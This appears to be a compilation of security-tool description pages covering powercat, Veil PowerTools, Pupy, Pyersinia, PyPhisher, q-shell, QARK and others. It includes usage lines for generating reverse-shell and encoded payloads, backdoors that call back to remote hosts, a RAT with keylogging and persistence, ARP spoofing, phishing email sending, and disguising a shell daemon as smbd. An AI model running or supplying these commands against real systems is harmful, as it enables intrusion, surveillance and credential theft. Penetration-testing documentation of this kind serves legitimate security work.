Relays in powercat work just like traditional netcat relays, but you don't have to create a file or start a second process. You can also relay data between connections of different protocols.
TCP Listener to TCP Client Relay:
    powercat -l -p 8000 -r tcp:10.1.1.16:443
TCP Listener to UDP Client Relay:
    powercat -l -p 8000 -r udp:10.1.1.16:53
TCP Listener to DNS Client Relay
    powercat -l -p 8000 -r dns:10.1.1.1:53:c2.example.com
TCP Listener to DNS Client Relay using the Windows Default DNS Server
    powercat -l -p 8000 -r dns:::c2.example.com
TCP Client to Client Relay
    powercat -c 10.1.1.1 -p 9000 -r tcp:10.1.1.16:443
TCP Listener to Listener Relay
    powercat -l -p 8000 -r tcp:9000

Generate Payloads
Payloads which do a specific action can be generated using -g (Generate Payload) and -ge (Generate Encoded Payload). Encoded payloads can be executed with powershell -E. You can use these if you don't want to use all of powercat.
Generate a reverse tcp payload which connects back to 10.1.1.15 port 443:
    powercat -c 10.1.1.15 -p 443 -e cmd -g
Generate a bind tcp encoded command which listens on port 8000:
    powercat -l -p 8000 -e cmd -ge

Misc Usage
powercat can also be used to perform portscans, and start persistent servers.
Basic TCP Port Scanner:
    (21,22,80,443) | % {powercat -c 10.1.1.10 -p $_ -t 1 -Verbose -d}
Start A Persistent Server That Serves a File:
    powercat -l -p 443 -i C:\inputfile -rep


Download Powercat

PowerTools - Collection Of PowerShell Projects With A Focus On Offensive Operations


Veil's PowerTools are a collection of PowerShell projects with a focus on offensive operations.

This collection contains five projects:
  • PowerUp
  • PowerBreach
  • PowerPick
  • PewPewPew
  • PowerView

PowerUp

PowerUp is a powershell tool to assist with local privilege escalation on Windows systems. It contains several methods to identify and abuse vulnerable services, as well as DLL hijacking opportunities, vulnerable registry settings, vulnerable schtasks, and more.

Service Enumeration:

Get-ServiceUnquoted             -   returns services with unquoted paths that also have a space in the name
Get-ServiceFilePermission       -   returns services where the current user can write to the service binary path or its config
Get-ServicePermission           -   returns services the current user can modify

Service Abuse:

Invoke-ServiceUserAdd           -   modifies a modifiable service to create a user and add it to the local administrators
Invoke-ServiceCMD               -   execute an arbitrary command through service abuse
Write-UserAddServiceBinary      -   writes out a patched C# service binary that adds a local administrative user
Write-CMDServiceBinary          -   writes out a patched C# binary that executes a custom command
Write-ServiceEXE                -   replaces a service binary with one that adds a local administrator user
Write-ServiceEXECMD             -   replaces a service binary with one that executes a custom command
Restore-ServiceEXE              -   restores a replaced service binary with the original executable
Invoke-ServiceStart             -   starts a given service
Invoke-ServiceStop              -   stops a given service
Invoke-ServiceEnable            -   enables a given service
Invoke-ServiceDisable           -   disables a given service
Get-ServiceDetail               -   returns detailed information about a service

DLL Hijacking:

Find-DLLHijack                  -   finds .dll hijacking opportunities for currently running processes
Find-PathHijack                 -   finds service %PATH% .dll hijacking opportunities
Write-HijackDll                 -   writes out a hijackable .dll

Registry Checks:

Get-RegAlwaysInstallElevated    -   checks if the AlwaysInstallElevated registry key is set
Get-RegAutoLogon                -   checks for Autologon credentials in the registry
Get-VulnAutoRun                 -   checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns

Misc.:

Get-VulnSchTask                 -   find schtasks with modifiable target files
Get-UnattendedInstallFile       -   finds remaining unattended installation files
Get-Webconfig                   -   checks for any encrypted web.config strings
Get-ApplicationHost             -   checks for encrypted application pool and virtual directory passwords
Write-UserAddMSI                -   write out a MSI installer that prompts for a user to be added
Invoke-AllChecks                -   runs all current escalation checks and returns a report


PowerBreach

PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system. It focuses on diversifying the "trigger" methods which allows the user flexibility on how to signal to the backdoor that it needs to phone home. PowerBreach focuses on memory only methods that do not persist across a reboot without further assistance and is not a silver bullet when it comes to cover communications.

Helper Functions:

Add-PSFirewallRules - Adds powershell to the firewall on 65K ports. Required Admin
Invoke-CallbackIEX - The location for the various callback mechanisms. Calls back and executes encoded payload.

Backdoors Available:

Invoke-EventLogBackdoor: Monitors for failed RDP login attempts. Admin-Yes, Firewall-No, Auditing Reqd
Invoke-PortBindBackdoor: Binds to TCP Port. Admin-No, Firewall-Yes
Invoke-ResolverBackdoor: Resolves name to decide when to callback. Admin-No, Firewall-No
Invoke-PortKnockBackdoor: Starts sniffer looking for trigger. Admin-Yes, Firewall-Yes
Invoke-LoopBackdoor: Callsback on set interval. Admin-No, Firewall-No
Invoke-DeadUserBackdoor: Looks for "dead" user and calls back when does not exist. Admin-No, Firewall-No

Callback URIs Available:

http://<host:port/resource> - Perform standard http callback
https://<host:port/resource> - Perform standard https callback
dnstxt://<host> - Resolve DNS text record for host which is the payload


PowerPick

This project focuses on allowing the execution of Powershell functionality without the use of Powershell.exe. Primarily this project uses.NET assemblies/libraries to start execution of the Powershell scripts.

Many thanks to those in the offensive powershell community. This work is not ground breaking but hopefully will motivate offense and defense to understand the implications and lack of protections available.

PSInject.ps1

This project provides a powershell scipt (psinject.ps1) which implements the Invoke-PSInject function. This script is based off Powersploit's Invoke-ReflectivePEInjection and reflectively injects the ReflectivePick DLL. It allows for the replacement of the callback URL that is hard coded into the DLL. See this script for more details.

The script that it calls back for must be base64 encoded. To do this, you can simply use the built in linux utility 'base64'.

Example:
import-module psinject.ps1
Invoke-PSInject -Verbose -ProcID 0000 -CBURL http://1.1.1.1/favicon.ico

ReflectivePick

This project is a reflective DLL based on Stephen Fewer's method. It imports/runs a .NET assembly into its memory space that supports the running of Powershell code using System.Management.Automation. Due to its' reflective property, it can be injected into any process using a reflective injector and allows the execution of Powershell code by any process, not just Powershell.exe. It extends inject/migrate capabilities into powershell.

This DLL is meant to be used with PSInject.ps1 which provide the ability to modify the hardcoded callback URL or with Metasploit after compiling or patching the URL manually.

SharpPick

This project is a .NET executable which allows execution of Powershell code through a number of methods. The script can be embedded as a resource, read from a url, appeneded to the binary, or read from a file. It was originally used as a proof of concept to demonstrate/test the blocking of powershell and bypass of applocker.

Man Page
sharppick.exe [<flag> <argument>]
flags:
-f <file> : Read script from specified file
-r <resource name> : Read script from specified resource
-d <url> : Read script from URL
-a <delimeter> : Read script appended to current binary after specified delimeter. Delimeter should be very very unique string

More SharpPick details here


PewPewPew

This repo contains scripts that utilize a common pattern to host a script on a PowerShell webserver, invoke the IEX download cradle to download/execute the target code and post the results back to the server, and then post-process any results.

More details here


PowerView

PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various windows "net *" commands, which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality.

It also impements various useful metafunctions, including some custom-written user-hunting functions which will identify where on the network specific users are logged into. It can also check which machines on the domain the current user has local administrator access on. Several functions for the enumeration and abuse of domain trusts also exist. See function descriptions for appropriate usage and available options.

To run on a machine, start PowerShell with "powershell -exec bypass" and then load the PowerView module with: PS> Import-Module .\powerview.psm1 or load the PowerView script by itself: PS> Import-Module .\powerview.ps1

For detailed output of underlying functionality, pass the -Debug flag to most functions.

For functions that enumerate multiple machines, pass the -Verbose flag to get a progress status as each host is enumerated. Most of the "meta" functions accept an array of hosts from the pipeline.


Misc Functions:

Export-PowerViewCSV             -   thread-safe CSV append
Set-MacAttribute                -   Sets MAC attributes for a file based on another file or input (from Powersploit)
Copy-ClonedFile                 -   copies a local file to a remote location, matching MAC properties
Get-IPAddress                   -   resolves a hostname to an IP
Test-Server                     -   tests connectivity to a specified server
Convert-NameToSid               -   converts a given user/group name to a security identifier (SID)
Convert-SidToName               -   converts a security identifier (SID) to a group/user name
Convert-NT4toCanonical          -   converts a user/group NT4 name (i.e. dev/john) to canonical format
Get-Proxy                       -   enumerates local proxy settings
Get-PathAcl                     -   get the ACLs for a local/remote file path with optional group recursion
Get-UserProperty                -   returns all properties specified for users, or a set of user:prop names
Get-ComputerProperty            -   returns all properties specified for computers, or a set of computer:prop names
Find-InterestingFile            -   search a local or remote path for files with specific terms in the name
Invoke-CheckLocalAdminAccess    -   check if the current user context has local administrator access to a specified host
Get-DomainSearcher              -   builds a proper ADSI searcher object for a given domain
Get-ObjectAcl                   -   returns the ACLs associated with a specific active directory object
Add-ObjectAcl                   -   adds an ACL to a specified active directory object
Invoke-ACLScanner               -   enumerate -1000+ modifable ACLs on a specified domain
Get-GUIDMap                     -   returns a hash table of current GUIDs -> display names
Get-DomainSID                   -   return the SID for the specified domain
Invoke-ThreadedFunction         -   helper that wraps threaded invocation for other functions

net * Functions:

Get-NetDomain                   -   gets the name of the current user's domain
Get-NetForest                   -   gets the forest associated with the current user's domain
Get-NetForestDomain             -   gets all domains for the current forest
Get-NetDomainController         -   gets the domain controllers for the current computer's domain
Get-NetUser                     -   returns all user objects, or the user specified (wildcard specifiable)
Add-NetUser                     -   adds a local or domain user
Get-NetComputer                 -   gets a list of all current servers in the domain
Get-NetPrinter                  -   gets an array of all current computers objects in a domain
Get-NetOU                       -   gets data for domain organization units
Get-NetSite                     -   gets current sites in a domain
Get-NetSubnet                   -   gets registered subnets for a domain
Get-NetGroup                    -   gets a list of all current groups in a domain
Get-NetGroupMember              -   gets a list of all current users in a specified domain group
Get-NetLocalGroup               -   gets the members of a localgroup on a remote host or hosts
Add-NetGroupUser                -   adds a local or domain user to a local or domain group
Get-NetFileServer               -   get a list of file servers used by current domain users
Get-DFSshare                    -   gets a list of all distribute file system shares on a domain
Get-NetShare                    -   gets share information for a specified server
Get-NetLoggedon                 -   gets users actively logged onto a specified server
Get-NetSession                  -   gets active sessions on a specified server
Get-NetRDPSession               -   gets active RDP sessions for a specified server (like qwinsta)
Get-LastLoggedOn                -   return the last logged on user for a target host
Get-NetProcess                  -   gets the remote processes and owners on a remote server
Get-UserEvent                   -   returns logon or TGT events from the event log for a specified host
Get-ADObject                    -   takes a domain SID and returns the user, group, or computer 
                                    object associated with it
Set-ADObject                    -   takes a SID, name, or SamAccountName to query for a specified
                                    domain object, and then sets a specified 'PropertyName' to a
                                    specified 'PropertyValue'

GPO functions

Get-GptTmpl                     -   parses a GptTmpl.inf to a custom object
Get-NetGPO                      -   gets all current GPOs for a given domain
Get-NetGPOGroup                 -   gets all GPOs in a domain that set "Restricted Groups" 
                                    on on target machines
Find-GPOLocation                -   takes a user/group and makes machines they have effective
                                    rights over through GPO enumeration and correlation
Find-GPOComputerAdmin           -   takes a computer and determines who has admin rights over it
                                    through GPO enumeration
Get-DomainPolicy                -   returns the default domain or DC policy

User-Hunting Functions:

Invoke-UserHunter               -   finds machines on the local domain where specified users are logged into, and can optionally check if the current user has local admin access to found machines
Invoke-StealthUserHunter        -   finds all file servers utilizes in user HomeDirectories, and checks the sessions one each file server, hunting for particular users
Invoke-ProcessHunter            -   hunts for processes with a specific name or owned by a specific user on domain machines
Invoke-UserEventHunter          -   hunts for user logon events in domain controller event logs

Domain Trust Functions:

Get-NetDomainTrust              -   gets all trusts for the current user's domain
Get-NetForestTrust              -   gets all trusts for the forest associated with the current user's domain
Find-ForeignUser                -   enumerates users who are in groups outside of their principal domain
Find-ForeignGroup               -   enumerates all the members of a domain's groups and finds users that are outside of the queried domain
Invoke-MapDomainTrust           -   try to build a relational mapping of all domain trusts

MetaFunctions:

Invoke-ShareFinder              -   finds (non-standard) shares on hosts in the local domain
Invoke-FileFinder               -   finds potentially sensitive files on hosts in the local domain
Find-LocalAdminAccess           -   finds machines on the domain that the current user has local admin access to
Find-UserField                  -   searches a user field for a particular term
Find-ComputerField              -   searches a computer field for a particular term
Get-ExploitableSystem           -   finds systems likely vulnerable to common exploits
Invoke-EnumerateLocalAdmin      -   enumerates members of the local Administrators groups across all machines in the domain


Download PowerTools

ProGuard - Java class file Shrinker, Optimizer, Obfuscator and Preverifier


ProGuard is a free Java class file shrinker, optimizer, obfuscator, and preverifier. It detects and removes unused classes, fields, methods, and attributes. It optimizes bytecode and removes unused instructions. It renames the remaining classes, fields, and methods using short meaningless names. Finally, it preverifies the processed code for Java 6 or higher, or for Java Micro Edition. 

Some uses of ProGuard are:
  • Creating more compact code, for smaller code archives, faster transfer across networks, faster loading, and smaller memory footprints.
  • Making programs and libraries harder to reverse-engineer.
  • Listing dead code, so it can be removed from the source code.
  • Retargeting and preverifying existing class files for Java 6 or higher, to take full advantage of their faster class loading.

ProGuard's main advantage compared to other Java obfuscators is probably its compact template-based configuration. A few intuitive command line options or a simple configuration file are usually sufficient. The user manual explains all available options and shows examples of this powerful configuration style.

ProGuard is fast. It only takes seconds to process programs and libraries of several megabytes. The results section presents actual figures for a number of applications.

ProGuard is a command-line tool with an optional graphical user interface. It also comes with plugins for Ant, for Gradle, and for the JME Wireless Toolkit.


What is shrinking?

Java source code (.java files) is typically compiled to bytecode (.class files). Bytecode is more compact than Java source code, but it may still contain a lot of unused code, especially if it includes program libraries. Shrinking programs such as ProGuard can analyze bytecode and remove unused classes, fields, and methods. The program remains functionally equivalent, including the information given in exception stack traces.

What is obfuscation?

By default, compiled bytecode still contains a lot of debugging information: source file names, line numbers, field names, method names, argument names, variable names, etc. This information makes it straightforward to decompile the bytecode and reverse-engineer entire programs. Sometimes, this is not desirable. Obfuscators such as ProGuard can remove the debugging information and replace all names by meaningless character sequences, making it much harder to reverse-engineer the code. It further compacts the code as a bonus. The program remains functionally equivalent, except for the class names, method names, and line numbers given in exception stack traces.

What is preverification?

When loading class files, the class loader performs some sophisticated verification of the byte code. This analysis makes sure the code can't accidentally or intentionally break out of the sandbox of the virtual machine. Java Micro Edition and Java 6 introduced split verification. This means that the JME preverifier and the Java 6 compiler add preverification information to the class files (StackMap and StackMapTable attributes, respectively), in order to simplify the actual verification step for the class loader. Class files can then be loaded faster and in a more memory-efficient way. ProGuard can perform the preverification step too, for instance allowing to retarget older class files at Java 6.

What kind of optimizations does ProGuard support?

Apart from removing unused classes, fields, and methods in the shrinking step, ProGuard can also perform optimizations at the bytecode level, inside and across methods. Thanks to techniques like control flow analysis, data flow analysis, partial evaluation, static single assignment, global value numbering, and liveness analysis, ProGuard can:
  • Evaluate constant expressions.
  • Remove unnecessary field accesses and method calls.
  • Remove unnecessary branches.
  • Remove unnecessary comparisons and instanceof tests.
  • Remove unused code blocks.
  • Merge identical code blocks.
  • Reduce variable allocation.
  • Remove write-only fields and unused method parameters.
  • Inline constant fields, method parameters, and return values.
  • Inline methods that are short or only called once.
  • Simplify tail recursion calls.
  • Merge classes and interfaces.
  • Make methods private, static, and final when possible.
  • Make classes static and final when possible.
  • Replace interfaces that have single implementations.
  • Perform over 200 peephole optimizations, like replacing ...*2 by ...<<1.
  • Optionally remove logging code.
The positive effects of these optimizations will depend on your code and on the virtual machine on which the code is executed. Simple virtual machines may benefit more than advanced virtual machines with sophisticated JIT compilers. At the very least, your bytecode may become a bit smaller.
Some notable optimizations that aren't supported yet:
  • Moving constant expressions out of loops.
  • Optimizations that require escape analysis (DexGuard does).

Download ProGuard

Project Artillery - Full Suite for Protection against Attack on Linux and Windows


Project Artillery is an open source project aimed at the detection of early warning indicators and attacks. The concept is that Artillery will spawn multiple ports on a system giving the attacker the idea that multiple ports are exposed. Additionally, Artillery actively monitors the filesystem for changes, brute force attacks, and other indicators of compromise. Artillery is a full suite for protection against attack on Linux and Windows based devices. It can be used as an early warning indicator of attackers on your network. Additionally, Artillery integrates into threat intelligence feeds which can notify when a previously seen attacker IP address has been identified. Artillery supports multiple configuration types, different versions of Linux, and can be deployed across multiple systems and events sent centrally.

Artillery is a combination of a honeypot, monitoring tool, and alerting system. Eventually this will evolve into a hardening monitoring platform as well to detect insecure configurations from nix systems. It's relatively simple, run ./setup.py and hit yes, this will install Artillery in /var/artillery and edit your /etc/init.d/rc.local to start artillery on boot up.

Features
  1. It sets up multiple common ports that are attacked. If someone connects to these ports, it blacklists them forever (to remove blacklisted ip's, remove them from /var/artillery/banlist.txt)
  2. It monitors what folders you specify, by default it checks /var/www and /etc for modifications.
  3. It monitors the SSH logs and looks for brute force attempts.
  4. It will email you when attacks occur and let you know what the attack was.
Be sure to edit the /var/artillery/config to turn on mail delivery, brute force attempt customizations, and what folders to monitor.

Project structure

For those technical folks you can find all of the code in the following structure:
  • src/core.py - main central code reuse for things shared between each module
  • src/monitor.py - main monitoring module for changes to the filesystem
  • src/ssh_monitor.py - main monitoring module for SSH brute forcing
  • src/honeypot.py - main module for honeypot detection
  • src/harden.py - check for basic hardening to the OS
  • database/integrity.data - main database for maintaining sha512 hashes of filesystem
  • setup.py - copies files to /var/artillery/ then edits /etc/init.d/artillery to ensure artillery starts per each reboot

Supported platforms
  • Linux
  • Windows

Video Installation of Artillery



Proxenet - Hacker Friendly Proxy for Web Application Penetration Tests


Proxenet is a hacker friendly proxy for web application penetration tests.

proxenet is a multi-threaded proxy which allows you manipulate your HTTP requests and responses using your favorite scripting language. No need to learn Java (like for Burp) or Python (like for mitmproxy). proxenet supports heaps of languages (see the section "Language Versions") and more can be easily added.

proxenet is not script kiddie friendly, neither GUI friendly. If this is what you are looking for, here are a few links for you:
Or the best way, write your own GUI as a proxenet plugin!

Why ?

The idea behind proxenet came after a lot of frustration from attempting to write extensions for Burp. Moreover, only a few proxies already existing supports the possibility to add new extensions. And when they do, they are (one) language specific - despite Burp persistent attempts to make unnatural bindings (Python over Java or worse Ruby over Java.

Being written in pure C, it is fast, efficient and easily pluggable to anything else. It is the utimate real DIY web proxy for pentest(ers).

Features

Here are a sample of features already supported by proxenet:
  • Written in C
    • Fast (heavy thread use)
    • Efficient (POSIX compatible)
    • Low memory footprint (for the core)
  • Can interact with any language
  • Provides plugins support for the following languages:
    • C
    • Python
    • Lua
    • Ruby
    • Perl
    • Tcl
    • Java
  • SSL
    • Full SSL interception (internal CA)
    • SSL client certificate authentication
  • IPv4/IPv6
  • HTTP Proxy forwarding
  • White-list/Black-list hosts filtering
  • Command interface out-of-band
  • Nice TTY colors :D
  • 100% Open-Source
... and more !

The best of both world ?

Some people might miss the beautiful interface some other GUI-friendly proxies provide. So be it! Plug proxenet as a relay behind your favorite Burp, Zap, Proxystrike, burst, etc. and enjoy the show!

How to start
$ git clone https://github.com/hugsy/proxenet.git
$ cd proxenet && cmake . && make


ProxyDroid - Set Proxys (Http / Socks4 / Socks5) on your Android devices


ProxyDroid is an app that can help you to set the proxy (http / socks4 / socks5) on your android devices.

FEATURES
  1. Support HTTP / HTTPS / SOCKS4 / SOCKS5 proxy
  2. Support basic / NTLM / NTLMv2 authentication methods
  3. Individual proxy for only one or several apps
  4. Multiple profiles support
  5. Bind configuration to WIFI's SSID / Mobile Network (2G / 3G)
  6. Widgets for quickly switching on/off proxy
  7. Low battery and memory consumption (written in C and compiled as native binary)
  8. Bypass custom IP address
  9. DNS proxy for guys behind the firewall that disallows to resolve external addresses
  10. PAC file support (only basic support, thanks to Rhino)

Dowbload ProxyDroid

Pupy - Multi-Platform Remote Administration Tool

Pupy is an opensource, multi-platform Remote Administration Tool written in Python. On Windows, Pupy uses reflective dll injection and leaves no traces on disk.

Features :
  • On windows, the Pupy payload is compiled as a reflective DLL and the whole python interpreter is loaded from memory. Pupy does not touch the disk :)
  • Pupy can reflectively migrate into other processes
  • Pupy can remotely import, from memory, pure python packages (.py, .pyc) and compiled python C extensions (.pyd). The imported python modules do not touch the disk. (.pyd mem import currently work on Windows only, .so memory import is not implemented).
  • modules are quite simple to write and pupy is easily extensible.
  • Pupy uses rpyc and a module can directly access python objects on the remote client
    • we can also access remote objects interactively from the pupy shell and even auto completion of remote attributes works !
  • communication channel currently works as a ssl reverse connection, but a bind payload will be implemented in the future
  • all the non interactive modules can be dispatched on multiple hosts in one command
  • Multi-platform (tested on windows 7, windows xp, kali linux, ubuntu)
  • modules can be executed as background jobs
  • commands and scripts running on remote hosts are interruptible
  • auto-completion and nice colored output :-)
  • commands aliases can be defined in the config

Implemented Modules :
  • migrate (windows only)
    • inter process architecture injection also works (x86->x64 and x64->x86)
  • keylogger (windows only)
  • persistence (windows only)
  • screenshot (windows only)
  • webcam snapshot (windows only)
  • command execution
  • download
  • upload
  • socks5 proxy
  • local port forwarding
  • interactive shell (cmd.exe, /bin/sh, ...)
  • interactive python shell
  • shellcode exec (thanks to @byt3bl33d3r)

Quick start

In these examples the server is running on a linux host (tested on kali linux) and it's IP address is 192.168.0.1
The clients have been tested on (Windows 7, Windows XP, kali linux, ubuntu, Mac OS X 10.10.5)

generate/run a payload
for Windows
./genpayload.py 192.168.0.1 -p 443 -t exe_x86 -o pupyx86.exe
you can also use -t dll_x86 or dll_x64 to generate a reflective DLL and inject/load it by your own means.

for Linux
pip install rpyc #(or manually copy it if you are not admin)
python reverse_ssl.py 192.168.0.1:443

for MAC OS X
easy_install rpyc #(or manually copy it if you are not admin)
python reverse_ssl.py 192.168.0.1:443

start the server
  1. eventually edit pupy.conf to change the bind address / port
  2. start the pupy server :
./pupysh.py

Some screenshots

list connected clients

help

execute python code on all clients

execute a command on all clients, exception is retrieved in case the command does not exists

use a filter to send a module only on selected clients

migrate into another process

interactive shell

interactive python shell


example: How to write a MsgBox module

first of all write the function/class you want to import on the remote client
in the example we create the file pupy/packages/windows/all/pupwinutils/msgbox.py
import ctypes
import threading

def MessageBox(text, title):
    t=threading.Thread(target=ctypes.windll.user32.MessageBoxA, args=(None, text, title, 0))
    t.daemon=True
    t.start()

then, simply create a module to load our package and call the function remotely
class MsgBoxPopup(PupyModule):
    """ Pop up a custom message box """

    def init_argparse(self):
        self.arg_parser = PupyArgumentParser(prog="msgbox", description=self.__doc__)
        self.arg_parser.add_argument('--title', help='msgbox title')
        self.arg_parser.add_argument('text', help='text to print in the msgbox :)')

    @windows_only
    def is_compatible(self):
        pass

    def run(self, args):
        self.client.load_package("pupwinutils.msgbox")
        self.client.conn.modules['pupwinutils.msgbox'].MessageBox(args.text, args.title)
        self.log("message box popped !")

Dependencies

rpyc (https://github.com/tomerfiliba/rpyc)

Roadmap and ideas

Some ideas without any priority order
  • support for https proxy
  • bind instead of reverse connection
  • add offline options to payloads like enable/disable certificate checking, embed offline modules (persistence, keylogger, ...), etc...
  • integrate scapy in the windows dll :D (that would be fun)
  • work on stealthiness and modules under unix systems
  • webcam snap
  • mic recording
  • socks5 udp support
  • remote port forwarding
  • perhaps write some documentation
  • ...
  • any cool idea ?

Pyersinia - Network Attack Tool

Pyersinia is a similar tool to Yersinia, but Pyersinia is implemented in Python using Scapy. The main objective is the realization of network attacks such as spoofing ARP, DHCP DoS , STP DoS among others. The community can add new attacks on the tool in a simple way, using plugins. This is because Pyersinia uses the STB (Security Tools Builder) framework.

What's new?

Adding new attacks on the tool is a simple task because we use the framework STB (Security Tool Builder). The new attacks are added by plugins.

Installation

Install pyersinia is so easy:
$ python -m pip install pyersinia
Or install from Pypi:
# pip install pyersinia

Quick start

You can display inline help writing:

positional arguments:
  arp_spoof_TARGET
  arp_spoof_VICTIM

optional arguments:
  -h, --help        show this help message and exit
  -v, --verbosity   verbosity level
  -a ATTACK_TYPE    choose supported attack type
  -i IFACE          choose network interface

supported attacks:
        arp_spoof, dhcp_discover_dos, stp_tcn, stp_conf, stp_root

examples:
        python pyersinia.py -a arp_spoof 127.0.0.1 127.0.0.1
        python pyersinia.py -a stp_root -i eth0


Download Pyersinia

PyPhisher - A Simple Python Tool for Phishing

If you are looking to make a phishing testing or demonstration you can check PyPhisher. This tool was created for the purpose of phishing during a penetration test. This tool is python based that provide user a way to send emails with a customized template that he design. you can have an html format that is similar to any organization and replace the links that you want to send.

This was inspired by SpearPhiser beta by Dave Kennedy from Trustedsec and a feature found in Cobalt Strike by Rapheal Mudge from Strategic Cyber

Usage:
PyPhisher.py --server mail.server.com --port 25 --username user --password password --html phish.txt --url_replace phishlink.com --subject Read!! --sender important@phish.com --sendto target@company.com

Available options:
--server          The SMTP server that you are going to be using to send the email
--port            The port number that is setup for SMTP
--html            The pre-crafted html that will be used in the email
--url_replace     The url that will be used to replace all links in the email
--subject         The subject that will appear in the email message
--sender          The sender that will appear on the email example
--sendto          Who you would like to send the email to


Download PyPhisher

Q-shell - Quick Shell for Unix Administrator

q-shell is quick shell for remote login into Unix system, it use blowfish crypt algorithm to protect transport data from client to server, you can get two program: 'qsh' for client, and 'qshd' for server, those program can rename by any name with you prefer.

Compile

Just enter 'make' and it will automation to compile, but, you must input the server key.

Usage
  1. server:
    Just run qshd on server:
       $ ./qshd
    
    But, you would like to run after change it to other name, such as:
       $ mv qshd smbd
       $ export PATH=.:$PATH
       $ smbd
    
  2. client:
    Set some environment variable, then run qsh:
      $ export _IP=127.0.0.1
      $ export _PORT=2800
      $ unset _P
      $ ./qsh shell
    
    Now you already login into server $_IP .

More function

q-shell include more function to manage system:

  1. put/get files:
    $ ./qsh get /path/to/server/file .
    $ ./qsh put /path/to/local/file  /path/to/server/file
    
  2. run a command on server:
    $ ./qsh exec 'ls -l /bin'
    
  3. update server program:
    $ ./qsh update /path/to/local/qshd
    
    This function will update remote qshd, and run again.
  4. automation to run command on many server:
    $ for i in {10..20} ; do \
          export _IP=192.168.0.$i
          export _PORT=2800
          export _P=key   # set key
          ./qsh exec 'ls -l /bin'
      done
    
    Note: qsh use $_P to fetch server key, so you should erase all history data after to use $_P.
  5. update password
    start with version 3.2, you can update the password as below:
      $ ./qsh passwd
    


Download Q-shell

QARK - Tool to look for several security related Android application vulnerabilities


Quick Android Review Kit - This tool is designed to look for several security related Android application vulnerabilities, either in source code or packaged APKs. The tool is also capable of creating "Proof-of-Concept" deployable APKs and/or ADB commands, capable of exploiting many of the vulnerabilities it finds. There is no need to root the test device, as this tool focuses on vulnerabilities that can be exploited under otherwise secure conditions.

Usage
To run in interactive mode:
$ python qark.py
To run in headless mode:
$ python qark.py --source 1 --pathtoapk /Users/foo/qark/sampleApps/goatdroid/goatdroid.apk --exploit 1 --install 1
or
$ python qark.py --source 2 -c /Users/foo/qark/sampleApps/goatdroid/goatdroid --manifest /Users/foo/qark/sampleApps/goatdroid/goatdroid/AndroidManifest.xml --exploit 1 --install 1
The sampleApps folder contains sample APKs that you can test against QARK

Requirements
  • python 2.7.6
  • JRE 1.6+ (preferably 1.7+)
  • OSX or Ubuntu Linux (Others may work, but not fully tested)

Documentation
QARK is an easy to use tool capable of finding common security vulnerabilities in Android applications. Unlike commercial products, it is 100% free to use. QARK features educational information allowing security reviewers to locate precise, in-depth explanations of the vulnerabilities. QARK automates the use of multiple decompilers, leveraging their combined outputs, to produce superior results, when decompiling APKs. Finally, the major advantage QARK has over traditional tools, that just point you to possible vulnerabilities, is that it can produce ADB commands, or even fully functional APKs, that turn hypothetical vulnerabilities into working "POC" exploits.
Included in the types of security vulnerabilities this tool attempts to find are:
  • Inadvertently exported components
  • Improperly protected exported components
  • Intents which are vulnerable to interception or eavesdropping
  • Improper x.509 certificate validation
  • Creation of world-readable or world-writeable files
  • Activities which may leak data
  • The use of Sticky Intents
  • Insecurely created Pending Intents
  • Sending of insecure Broadcast Intents
  • Private keys embedded in the source
  • Weak or improper cryptography use
  • Potentially exploitable WebView configurations
  • Exported Preference Activities
  • Tapjacking
  • Apps which enable backups
  • Apps which are debuggable
  • Apps supporting outdated API versions, with known vulnerabilities

Roadmap
Things that are coming soon:
  • Rewrite of code to support extensibility
  • Bound Service vulnerability detection and exploitation
  • Content Provider vulnerability detection and exploitation
  • Additional WebView configuration demonstrations
  • Static Tapjacking mitigation detection
  • File browser capable of using root permissions

Download QARK

RAWR - Rapid Assessment of Web Resources


  Features
  • A customizable CSV containing ordered information gathered for each host, with a field for making notes/etc. 
  • An elegant, searchable, JQuery-driven HTML report that shows screenshots, diagrams, and other information. 

  • A report on relevent security headers, courtesy of SmeegeSec.

  • a CSV Threat Matrix for an easy view of open ports across all provided hosts. (Use -a to show all ports.)


  • A wordlist for each host, comprised of all words found in responses. (including crawl, if used).
  • Default password suggestions through checking a service's CPE for matches in the DPE Database.
  • A shelve database of all host information. (planned comparison functionality)
  • Parses meta-data in documents and photos using customizable modules.
  • Supports the use of a proxy (Burp, Zap, W3aF)
  • Captures/stores SSL Certificates, Cookies, and Cross-domain.xml
  • [Optional] Customizable crawl of links within the host's domain.
  • [Optional] PNG Diagram of all pages found during crawl



  • [Optional] List of links crawled in tiered format.
  • [Optional] List of documents seen for each site.
  • [Optional] Automation-Friendly output (JSON strings)



  • Input
    • Using Prior Scan Data
      • -c <RAWR .cfg file>
        • .cfg files containing that scan's settings are created for every run.

      • -f <file, csv list of files, or directory>
        • It will parse the following formats:
        • NMap - XML (requires -sV)
        • Nessus - XML v2 (requires "Service Detection" plugin)
        • Metasploit - CSV
        • Qualys - Port Services Report CSV
        • Qualys - Asset Search XML (requires QIDs 86000,86001,86002)
        • Nexpose - Simple XML, XML, XML v2
        • OpenVAS - XML

    • Using NMap
      • RAWR accepts valid NMap input strings (CIDR, etc) as an argument
        • -i can be used to feed it a line-delimited list.
      • use -t <timing> and/or -s <source port>
      • use -p <port|all|fuzzdb> to specify port #(s), all for 1-65353, or fuzzdb to use the FuzzDB Common Ports
      • --ssl will call enum-ciphers.nse for more in-depth SSL data.

    Enumeration
    • In [conf/settings.py], 'flist' defines the fields that will be in the CSV as well as the report.
      • The section at the bottom - "DISABLED COLUMNS" is a list of interesting data points that are not shown by default.

    • --dns will have it query Bing for other hostnames and add them to the queue.
      • (Planned) If IP is non-routable, RAWR will request an AXFR using 'dig'
      • This is for external resources - non-routables are skipped.
      • Results are cached for the duration of the scan to prevent unneeded calls.

    • -o, -r, and -x make additional calls to grab HTTP OPTIONS, robots.txt, and crossdomain.xml, respectively

    • Try --downgrade to make requests with HTTP/1.0
      • Possible to glean more info from the 'chattier' version
      • Screenshots are still made via HTTP/1.1, so expect that when viewing the traffic.

    • --noss will omit the collection of screenshots
      • The HTML report still functions, but will show the '!' image for all hosts.

    • Proxy your requests with --proxy=<ip:port>
      • This works well with BurpSuite, Zap, or W3aF.

    • Crawl the site with --spider, notating files and docs in the log directory's 'maps' folder.
